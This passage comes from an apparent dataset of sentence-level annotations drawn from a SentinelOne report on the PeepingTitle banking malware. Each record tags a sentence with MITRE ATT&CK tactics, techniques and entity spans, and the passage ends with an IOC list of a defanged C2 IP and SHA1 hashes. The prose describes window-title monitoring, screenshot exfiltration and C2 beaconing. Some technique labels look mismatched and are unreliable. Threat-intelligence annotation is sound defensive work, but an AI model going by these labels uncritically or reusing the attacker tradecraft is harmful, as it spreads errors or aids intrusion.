PeepingTitle variant monitors the titles of application windows that have captured the mouse cursor.", "sentence_text": "The malware first transforms a window title into a lowercase string stripped of any whitespace characters.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1057", "name": "Process Discovery" } ], "procedure": "Normalizes window titles by removing whitespace and lowercasing", "entities": [ { "text": "The malware", "start": 0, "end": 11, "label": "MalwareTool" }, { "text": "transforms a window title into a lowercase string stripped of any whitespace characters.", "start": 18, "end": 106, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s32-07e4ff", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 32, "context_before": "The malware first transforms a window title into a lowercase string stripped of any whitespace characters.", "sentence_text": "It then checks if the transformed title contains any of the strings from a predefined set of strings related to targeted institutions.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1057", "name": "Process Discovery" } ], "procedure": "Matches window titles against predefined target-related strings", "entities": [ { "text": "It", "start": 0, "end": 2, "label": "MalwareTool" }, { "text": "checks if the transformed title contains any of the strings", "start": 8, "end": 67, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s33-10f404", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 33, "context_before": "It then checks if the transformed title contains any of the strings from a predefined set of strings related to targeted institutions.", "sentence_text": "The predefined strings are defined such that they are part of the browser window titles when a user visits the online resources (i.e., sites or specific online services) of predominantly Portuguese financial institutions or institutions with a presence in Portugal.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1057", "name": "Process Discovery" } ], "procedure": "Defines strings to match browser window titles of targeted institutions.", "entities": [ { "text": "predefined strings", "start": 4, "end": 22, "label": "MalwareTool" }, { "text": "predefined strings are defined such that they are part of the browser window titles", "start": 4, "end": 87, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s34-ec5eda", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 34, "context_before": "The predefined strings are defined such that they are part of the browser window titles when a user visits the online resources (i.e., sites or specific online services) of predominantly Portuguese financial institutions or institutions with a presence in Portugal.", "sentence_text": "The table below lists some of the targeted institutions and services.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s35-2b7d38", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 35, "context_before": "The table below lists some of the targeted institutions and services.", "sentence_text": "When a user visits a targeted online resource, PeepingTitle sets the window title monitoring interval to 5 seconds, connects to a C2 server, and exfiltrates data in an encrypted form.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" }, { "id": "TA0010", "name": "Exfiltration" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Monitors window titles at intervals\n\nConnects to C2 server\n\nExfiltrates data in encrypted form", "entities": [ { "text": "PeepingTitle", "start": 47, "end": 59, "label": "MalwareTool" }, { "text": "C2 server", "start": 130, "end": 139, "label": "Infrastructure_Indicator" }, { "text": "sets the window title monitoring interval", "start": 60, "end": 101, "label": "Action" }, { "text": "connects to a C2 server", "start": 116, "end": 139, "label": "Action" }, { "text": "exfiltrates data in an encrypted form.", "start": 145, "end": 183, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s36-70105e", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 36, "context_before": "When a user visits a targeted online resource, PeepingTitle sets the window title monitoring interval to 5 seconds, connects to a C2 server, and exfiltrates data in an encrypted form.", "sentence_text": "This registers the infected machine at the C2 server.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Registers infected machine with C2 server", "entities": [ { "text": "C2 server.", "start": 43, "end": 53, "label": "Infrastructure_Indicator" }, { "text": "registers the infected machine", "start": 5, "end": 35, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s37-662639", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 37, "context_before": "This registers the infected machine at the C2 server.", "sentence_text": "PeepingTitle implements backdoor capabilities that allow for full control over the compromised machines, some of which are:\nProcess termination and screenshot capture: PeepingTitle can take screenshots of the entire screen.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1113", "name": "Screen Capture" } ], "procedure": "Full control over compromised machines\n\nProcess termination\n\nScreenshot capture", "entities": [ { "text": "PeepingTitle", "start": 0, "end": 12, "label": "MalwareTool" }, { "text": "implements backdoor capabilities", "start": 13, "end": 45, "label": "Action" }, { "text": "Process termination", "start": 124, "end": 143, "label": "Action" }, { "text": "screenshot capture", "start": 148, "end": 166, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s38-eb4d54", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 38, "context_before": "PeepingTitle implements backdoor capabilities that allow for full control over the compromised machines, some of which are:\nProcess termination and screenshot capture: PeepingTitle can take screenshots of the entire screen.", "sentence_text": "The staged malware could implement any capabilities the threat actor may need in a given situation, such as further data exfiltration, or interaction and overlay screen capabilities to bypass multi-factor authentication.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1114", "name": "Email Collection" }, { "id": "T1552", "name": "Unsecured Credentials" }, { "id": "T1552", "name": "Unsecured Credentials" } ], "procedure": "Data exfiltration\n\nScreen overlay / interaction for MFA bypass", "entities": [ { "text": "The staged malware ", "start": 0, "end": 19, "label": "MalwareTool" }, { "text": " data exfiltration, or interaction and overlay screen capabilities to bypass multi-factor authentication.", "start": 115, "end": 220, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s39-9f665f", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 39, "context_before": "The staged malware could implement any capabilities the threat actor may need in a given situation, such as further data exfiltration, or interaction and overlay screen capabilities to bypass multi-factor authentication.", "sentence_text": "PeepingTitle supports the execution of Windows PE images and DLL files using the rundll32 Windows utility.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1218", "name": "System Binary Proxy Execution" } ], "procedure": "Execution of PE and DLL files using rundll32", "entities": [ { "text": "PeepingTitle", "start": 0, "end": 12, "label": "MalwareTool" }, { "text": "execution of Windows PE images and DLL files using the rundll32", "start": 26, "end": 89, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s40-5a1a75", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 40, "context_before": "PeepingTitle supports the execution of Windows PE images and DLL files using the rundll32 Windows utility.", "sentence_text": "In contrast to the first variant, the second PeepingTitle variant registers the infected machine at the C2 server upon execution: The malware exfiltrates data in an encrypted form, which includes the name of the infected machine and volume serial numbers.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Machine registration at C2 server\n\nExfiltration of system information (hostname, volume serial numbers)", "entities": [ { "text": "second PeepingTitle variant", "start": 38, "end": 65, "label": "MalwareTool" }, { "text": "C2 server", "start": 104, "end": 113, "label": "Infrastructure_Indicator" }, { "text": "registers the infected machine at the C2 server upon execution: The malware exfiltrates data in an encrypted form", "start": 66, "end": 179, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s41-8e92ae", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 41, "context_before": "In contrast to the first variant, the second PeepingTitle variant registers the infected machine at the C2 server upon execution: The malware exfiltrates data in an encrypted form, which includes the name of the infected machine and volume serial numbers.", "sentence_text": "The malware then continues to monitor for changes of the top-level window and takes a screenshot of this window whenever the user changes it.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1113", "name": "Screen Capture" } ], "procedure": "Monitor top-level windows\n\nTake screenshots of active windows when they change", "entities": [ { "text": " malware", "start": 3, "end": 11, "label": "MalwareTool" }, { "text": "monitor for changes of the top-level window and takes a screenshot", "start": 30, "end": 96, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s42-707923", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 42, "context_before": "The malware then continues to monitor for changes of the top-level window and takes a screenshot of this window whenever the user changes it.", "sentence_text": "PeepingTitle sends the screenshot to a different C2 server than the one used for registering the infected machine.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1020", "name": "Automated Exfiltration" } ], "procedure": "Send captured screenshots to a C2 server", "entities": [ { "text": "PeepingTitle", "start": 0, "end": 12, "label": "MalwareTool" }, { "text": " C2 server", "start": 48, "end": 58, "label": "Infrastructure_Indicator" }, { "text": "sends the screenshot to a different C2 server", "start": 13, "end": 58, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s43-a64fd1", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 43, "context_before": "PeepingTitle sends the screenshot to a different C2 server than the one used for registering the infected machine.", "sentence_text": "The figure below depicts PeepingTitle monitoring for changes of the top-level window, when this window is first of the Task Manager application and then twice of a new Google Chrome tab – the backdoor will take a screenshot of the Google Chrome window only once.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1113", "name": "Screen Capture" } ], "procedure": "Monitor top-level windows and capture screenshots of targeted windows.", "entities": [ { "text": "PeepingTitle", "start": 25, "end": 37, "label": "MalwareTool" }, { "text": "monitoring for changes of the top-level window,", "start": 38, "end": 85, "label": "Action" }, { "text": "take a screenshot", "start": 206, "end": 223, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s44-78cee5", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 44, "context_before": "The figure below depicts PeepingTitle monitoring for changes of the top-level window, when this window is first of the Task Manager application and then twice of a new Google Chrome tab – the backdoor will take a screenshot of the Google Chrome window only once.", "sentence_text": "Infrastructure Analysis\nAnalysis of all infrastructure associated with the threat group behind Operation Magalenha revealed noteworthy changes in design for the operation.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588", "name": "Obtain Capabilities" } ], "procedure": "Analysis of attacker infrastructure to observe operational changes.", "entities": [ { "text": "hreat group behind Operation Magalenha", "start": 76, "end": 114, "label": "ThreatActor" }, { "text": "infrastructure associated with the threat group", "start": 40, "end": 87, "label": "Infrastructure_Indicator" }, { "text": "Analysis of all infrastructure", "start": 24, "end": 54, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s45-2dfa7e", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 45, "context_before": "Infrastructure Analysis\nAnalysis of all infrastructure associated with the threat group behind Operation Magalenha revealed noteworthy changes in design for the operation.", "sentence_text": "First, it is useful to understand the threat actors’ infrastructure design prior to the latest 2023 activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s46-933016", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 46, "context_before": "First, it is useful to understand the threat actors’ infrastructure design prior to the latest 2023 activity.", "sentence_text": "One provider that became increasingly popular was Timeweb, the Russian IaaS provider.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s47-f6fed8", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 47, "context_before": "One provider that became increasingly popular was Timeweb, the Russian IaaS provider.", "sentence_text": "Moving into 2023, the threat group shifted from primarily using DigitalOcean Spaces to Timeweb for malware hosting and C2.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "shifted from primarily using DigitalOcean Spaces to Timeweb for malware hosting and C2", "entities": [ { "text": "the threat group ", "start": 18, "end": 35, "label": "ThreatActor" }, { "text": "DigitalOcean Spaces to Timeweb", "start": 64, "end": 94, "label": "Infrastructure_Indicator" }, { "text": "shifted from primarily using DigitalOcean Spaces to Timeweb for malware hosting and C2.", "start": 35, "end": 122, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s48-a19caa", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 48, "context_before": "Moving into 2023, the threat group shifted from primarily using DigitalOcean Spaces to Timeweb for malware hosting and C2.", "sentence_text": "Today, the actor continues to use Timeweb Cloud S3 object storage similar to how DigitalOcean was abused.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1583.003", "name": "Virtual Private Server" } ], "procedure": "continues to use Timeweb Cloud S3 object storage similar to how DigitalOcean was abused", "entities": [ { "text": "the actor", "start": 7, "end": 16, "label": "ThreatActor" }, { "text": "Timeweb Cloud S3 object storage", "start": 34, "end": 65, "label": "Infrastructure_Indicator" }, { "text": "DigitalOcean", "start": 81, "end": 93, "label": "Infrastructure_Indicator" }, { "text": "continues to use Timeweb Cloud S3 object storage", "start": 17, "end": 65, "label": "Action" }, { "text": "DigitalOcean was abused.", "start": 81, "end": 105, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s49-a64714", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 49, "context_before": "Today, the actor continues to use Timeweb Cloud S3 object storage similar to how DigitalOcean was abused.", "sentence_text": "Note that limited Timeweb use overlapped with DigitalOcean use since mid 2022; however, the change appears more strategic since the start of 2023.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1583.003", "name": "Virtual Private Server" } ], "procedure": "limited Timeweb use overlapped with DigitalOcean use since mid 2022", "entities": [ { "text": " Timeweb ", "start": 17, "end": 26, "label": "Infrastructure_Indicator" }, { "text": "DigitalOcean", "start": 46, "end": 58, "label": "Infrastructure_Indicator" }, { "text": " limited Timeweb use overlapped with DigitalOcean use", "start": 9, "end": 62, "label": "Action" }, { "text": "the change appears more strategic", "start": 88, "end": 121, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s50-0f2cbf", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 50, "context_before": "Note that limited Timeweb use overlapped with DigitalOcean use since mid 2022; however, the change appears more strategic since the start of 2023.", "sentence_text": "The shift away from DigitalOcean was due to increased difficulty in hosting the malware without campaign disruption.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1583.003", "name": "Virtual Private Server" } ], "procedure": "shift away from DigitalOcean due to increased difficulty in hosting the malware", "entities": [ { "text": " the malware", "start": 75, "end": 87, "label": "MalwareTool" }, { "text": " DigitalOcean", "start": 19, "end": 32, "label": "Infrastructure_Indicator" }, { "text": " shift away from DigitalOcean", "start": 3, "end": 32, "label": "Action" }, { "text": "difficulty in hosting the malware without campaign disruption.", "start": 54, "end": 116, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s51-71e43e", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 51, "context_before": "The shift away from DigitalOcean was due to increased difficulty in hosting the malware without campaign disruption.", "sentence_text": "Following this design change, a new cluster of activity can be built and linked to the same actor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s52-b6dfd7", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 52, "context_before": "Following this design change, a new cluster of activity can be built and linked to the same actor.", "sentence_text": "The cluster makes use of new C2 servers, Timeweb Cloud malware hosting locations, and of course malware samples.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1583.003", "name": "Virtual Private Server" } ], "procedure": "makes use of new C2 servers and Timeweb Cloud hosting locations", "entities": [ { "text": "malware samples.", "start": 96, "end": 112, "label": "MalwareTool" }, { "text": "new C2 servers, Timeweb Cloud malware hosting locations", "start": 25, "end": 80, "label": "Infrastructure_Indicator" }, { "text": " makes use of", "start": 11, "end": 24, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s53-8c86d3", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 53, "context_before": "The cluster makes use of new C2 servers, Timeweb Cloud malware hosting locations, and of course malware samples.", "sentence_text": "Of note, the server has open directories showing a file structure and provides us some insight into backend server design and a small number of victim hosts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s54-b84da3", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 54, "context_before": "Of note, the server has open directories showing a file structure and provides us some insight into backend server design and a small number of victim hosts.", "sentence_text": "Further clues point to Brazilian-Portuguese-speaking threat actors, such as mdfiles.php returning ARQUIVO ENVIADO!", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s55-b93ea7", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 55, "context_before": "Further clues point to Brazilian-Portuguese-speaking threat actors, such as mdfiles.php returning ARQUIVO ENVIADO!", "sentence_text": "(FILE SENT!)\nto beaconing hosts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s56-5a1773", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 56, "context_before": "(FILE SENT!)\nto beaconing hosts.", "sentence_text": "Additionally, the publicly available file (SHA1:\ndff84020be1f4691bed628d300df8a8b12a4de7e\n) contains Base64 data, which can be decoded to show the configuration file set to beacon to 193.218.204[.]207 while also containing Brazilian-Portuguese text for VARIABLE IS OK and UPDATE Conclusion Operation Magalenha indicates the persistent nature of the Brazilian threat actors.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "The malware configuration decoded from Base64 specifies a command-and-control beaconing channel to a remote IP address for communication with the operator.", "entities": [ { "text": "beacon to 193.218.204[.]207", "start": 173, "end": 200, "label": "Action" }, { "text": "193.218.204[.]207", "start": 183, "end": 200, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s57-8bebc0", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 57, "context_before": "Additionally, the publicly available file (SHA1:\ndff84020be1f4691bed628d300df8a8b12a4de7e\n) contains Base64 data, which can be decoded to show the configuration file set to beacon to 193.218.204[.]207 while also containing Brazilian-Portuguese text for VARIABLE IS OK and UPDATE Conclusion Operation Magalenha indicates the persistent nature of the Brazilian threat actors.", "sentence_text": "These groups represent an evolving threat to organizations and individuals in their target countries and have demonstrated a consistent capacity to update their malware arsenal and tactics, allowing them to remain effective in their campaigns.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Update malware and tactics", "entities": [ { "text": "These groups", "start": 0, "end": 12, "label": "ThreatActor" }, { "text": "malware arsenal", "start": 161, "end": 176, "label": "MalwareTool" }, { "text": "update their malware arsenal and tactics", "start": 148, "end": 188, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s58-8df942", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 58, "context_before": "These groups represent an evolving threat to organizations and individuals in their target countries and have demonstrated a consistent capacity to update their malware arsenal and tactics, allowing them to remain effective in their campaigns.", "sentence_text": "As such, it is important for organizations and individuals to remain vigilant and take proactive measures to protect themselves from this threat.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s59-0c60b7", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 59, "context_before": "As such, it is important for organizations and individuals to remain vigilant and take proactive measures to protect themselves from this threat.", "sentence_text": "Indicators of Compromise Below is a list of shortened URLs, SHA1 hashes (of scripts, archive files, and malware samples), and URLs (malware hosting and C2 server locations) associated with Operation Magalenha and related activities conducted by the threat group behind the operation dating back to 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s60-0f5907", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 60, "context_before": "Indicators of Compromise Below is a list of shortened URLs, SHA1 hashes (of scripts, archive files, and malware samples), and URLs (malware hosting and C2 server locations) associated with Operation Magalenha and related activities conducted by the threat group behind the operation dating back to 2022.", "sentence_text": "Shortened URLs\nSHA1 Hashes\n001334b045e0d1e28c260380f24c1fa072cb12eb\n0131862cd70303d560d47333cce4d2b58505222e\n045d5be69b5ba4ffb4253b029cc01d827706c75a\n0716415bc910e4a9501d43ac03410288a4e860d4\n071c53099decea6d9117e4ee519470140c68c7e9\n0a202ca568087eabeb741648be4255d834ab14b1\n13b370f368c1df2d30bb8fdf96d84e66e07c8a79\n17fe9cdd20a64fec5d471f6878a462a2ef0af212\n1a5ad2fb1d4fc4971286bdd5abf669722d7e4c19\n1e65c104c765e6e46887f7de04cc14f52dbdfe98\n208572a9f44d5349382c58d51d2d14532bc87bb3\n266a1c4b8bd95595dcdd46bcb409ee773bd2f407\n268d93bfd3f0a8a5cd76eea6311eb2a0b754a4e2\n26be17aef483d553c0e5678e35611b019acd28a3\n280999b0490bbe06665d35f2cda373fa32bfc59c\n2ee320533e687da7613721446dabceecafb940c1\n3079bba1a2372282f6bb4a35706144d5b9800953\n32d15771736bb5c3232c3fa68ee3da4161177413\n35597059ae1f14f50d7fe8b1858525552f62da19\n3a1e1294e894b9dd35edfdd59f67049729121619\n3be8f26dbc49b8a2504c58de247b838888e15a17\n418fabf734c0803f2686a41665f06525cfa3adbb\n41ab10d5e057e714d8caad5855c115f5bef76097\n42ee272c6bc93c5c0c47024f631350c23edc06fe\n43a55a5954d56c4e9fe63cfdd6ab0c97766c9642\n44da6f99de08e5193a64a89ce696d775248314d9\n45304d8ae20e0fcaf975be64b7844c361ae61537\n470e52d04a89318a868402617b2edd16e1a20613\n483a4a7e4650502e36dacde33652bf6b62718822\n48e77c8ab75d042d1526fe3cd40beeea5fff7794\n494d166f7b052c7feaf5666062dcf54525873ac2\n4fc26b033677b6a6dc77ae3c4451d3d4421bcc04\n51be9fb55ff9606b0f4e887d332608f41533215e\n52d06e3b0e3b91165bdba769a94710bbdad8d8d7\n542b320b77bb3f826ee17009564613352e5a4911\n5c9fc5902ced06f7068f95dfa7c25c1939be3f51\n5e38e6a927309aac4679a6d63c1e01b3830ca7c7\n5ee9c3e8ff35bc0435d0691112d7f101856d9a51\n603ac1e61a39c74d5053ccedd6964ce5f9f365f3\n62a1fd987b051586132b1d1752d78821139efb7f\n62b1ef509f0f9dffa611f3addface8f91089b0c3\n69beb59e75f70487edbbf997aba83b926674a355", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s61-1760cb", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 61, "context_before": "Shortened URLs\nSHA1 Hashes\n001334b045e0d1e28c260380f24c1fa072cb12eb\n0131862cd70303d560d47333cce4d2b58505222e\n045d5be69b5ba4ffb4253b029cc01d827706c75a\n0716415bc910e4a9501d43ac03410288a4e860d4\n071c53099decea6d9117e4ee519470140c68c7e9\n0a202ca568087eabeb741648be4255d834ab14b1\n13b370f368c1df2d30bb8fdf96d84e66e07c8a79\n17fe9cdd20a64fec5d471f6878a462a2ef0af212\n1a5ad2fb1d4fc4971286bdd5abf669722d7e4c19\n1e65c104c765e6e46887f7de04cc14f52dbdfe98\n208572a9f44d5349382c58d51d2d14532bc87bb3\n266a1c4b8bd95595dcdd46bcb409ee773bd2f407\n268d93bfd3f0a8a5cd76eea6311eb2a0b754a4e2\n26be17aef483d553c0e5678e35611b019acd28a3\n280999b0490bbe06665d35f2cda373fa32bfc59c\n2ee320533e687da7613721446dabceecafb940c1\n3079bba1a2372282f6bb4a35706144d5b9800953\n32d15771736bb5c3232c3fa68ee3da4161177413\n35597059ae1f14f50d7fe8b1858525552f62da19\n3a1e1294e894b9dd35edfdd59f67049729121619\n3be8f26dbc49b8a2504c58de247b838888e15a17\n418fabf734c0803f2686a41665f06525cfa3adbb\n41ab10d5e057e714d8caad5855c115f5bef76097\n42ee272c6bc93c5c0c47024f631350c23edc06fe\n43a55a5954d56c4e9fe63cfdd6ab0c97766c9642\n44da6f99de08e5193a64a89ce696d775248314d9\n45304d8ae20e0fcaf975be64b7844c361ae61537\n470e52d04a89318a868402617b2edd16e1a20613\n483a4a7e4650502e36dacde33652bf6b62718822\n48e77c8ab75d042d1526fe3cd40beeea5fff7794\n494d166f7b052c7feaf5666062dcf54525873ac2\n4fc26b033677b6a6dc77ae3c4451d3d4421bcc04\n51be9fb55ff9606b0f4e887d332608f41533215e\n52d06e3b0e3b91165bdba769a94710bbdad8d8d7\n542b320b77bb3f826ee17009564613352e5a4911\n5c9fc5902ced06f7068f95dfa7c25c1939be3f51\n5e38e6a927309aac4679a6d63c1e01b3830ca7c7\n5ee9c3e8ff35bc0435d0691112d7f101856d9a51\n603ac1e61a39c74d5053ccedd6964ce5f9f365f3\n62a1fd987b051586132b1d1752d78821139efb7f\n62b1ef509f0f9dffa611f3addface8f91089b0c3\n69beb59e75f70487edbbf997aba83b926674a355", "sentence_text": "6a43e8c05194e066b85845e454d41bf86e1ab376\n6a977ae1ad3466f20f50e101b5a561ad3ffc3aa7\n6c3d57a7b6631adbe3b6a2c2d88eef6593c51900\n6e00ef494a5955df4802c078ae3ffc6c6abdcbd7\n72b3be646f03a71e8a2632096ddf6638bc0141c9\n7339585c17aaa96e93f971b64548666a3b09d1f9\n738aff3e88f498c3607eeadd37b95791acf40196\n76b1bb307e1489999da725c2c9fac5b4581cb448\n7992e075bc9de98e944930372f1768ccc08e429f\n79ce7defeed60bba523bc3779cb9379435157f93\n7bbe644df54723d7a48bef58a616a62559401d0d\n7e82f8608c199eb32230dd2706c11b2e70ba13d8\n7f3c5142f60cd36073b54eda77b38be754a5f7d5\n824268bffde52dc44fedc254dc59ef559b7b2d17\n830c4e2cc10bbf122882a177a3ea8e810b114c82\n8752dab95747175bdb6cb7772cf4d11858049c9d\n87ff9f5f3f4853d0c218ac36182fa18bc5e206d0\n890c8ab68be8990deb26dab6f5c82f0a812b9fcb\n8c62851c74dc2bd1077edfb7456f87b47199925c\n8cc16c418764d26b15d41f713551a7d0f214ab4c\n97bab3df5acbd1e4ad8b9a38cbbd80c297971490\n9ab7bc8a9b4ccbc75903e78d96357e11dfd97535\n9c997e9ee92209be186de2a4f9696122bdfbc46d\n9eaa52e9f72f0b43648699a3a511d0a7c6ffcdd5\na0721a76cc8a0e44bf734206638ba013da809325\na28db721736fe5d6281c08b4f2f396da480eb170\na53b9e14f316a62e8c6c7a53a7c98158fda29533\na7c7233274e34b69b6c62caceebb19135f9034b2\nacc753a084b8172981b3086122929eb4abde131a\nafd5ccd6effb4eed6aec656a25ed869b954ee213\naffcb29e3e8b510cab6b836672511bc738f2d328\nb0253186f56662ecfbebf95cc91a887e161e32d3\nb427cf74c820985cc3cedef68b9953c2e83631e1\nb50ced2769e74050b130fbcb28c6d80880cfe612\nb7ce5ab969a2088a7d6c401c72eeff63173ce491\nbed147a98e6bff36cf3bccfc7640d444040e1f0c\nc3aa8423bba6f01528f822eddb692ae56aa1be6b\nc43f60bf6c24dd6c290b40afb26ea60094688a73\nc4c59fc68f225bdec7e22bead289fda2503fb6b0\nc5239a9994ca54ac08e45ce7443d9226151d0b36\ncd5892ca5b21999799a04d72fb93dc815f7227aa\ncdd2f94c542bf369702271cd83c6aa9ff2e595ea\nd1dca2dc87376c833644a04c74e4f102565e810a\nd2e078450e479a6cd3b1d95597fd2204fd370c42\nd86aabf4713b18718421b5c0fd4084143d4f7f08\ndb9521169aaad154e31d4e573414459e26b57900\ndc04ad9e1d8022a06a28d0522b2a1988c8ed4bab\ndcdf79b172f340dc173d038d05c7eb826c55c3dc\ndd46a9c61ad4aee2c865a4144733d1daf7d6bc79\ndec59a76e8f1703d15fcb7f7532c759aaf717165\ndf0a90c8890f83f760e41c853d9033d3971194e9\ndf99c6fabdf6fc664e9c466af8a2986af0bfbfb8\ndff84020be1f4691bed628d300df8a8b12a4de7e\ndff84020be1f4691bed628d300df8a8b12a4de7e\ne6215a2e0c4745eef724019cab07c04dac75725e\ne9f9a5f559366a8e66f81d43ecc05d051b6e3853\neaa2c945b22f5c1b8bfbd6d8692826d841fc9185\nf00493ea6b1a2cb50c74feb3af65bfaabf327a07\nf534e0a04ceb6f3e1a10209f416675e9df127afc\nf5a99ecd7847cc79210d5df505e222828ad63199\nf66d71e1ab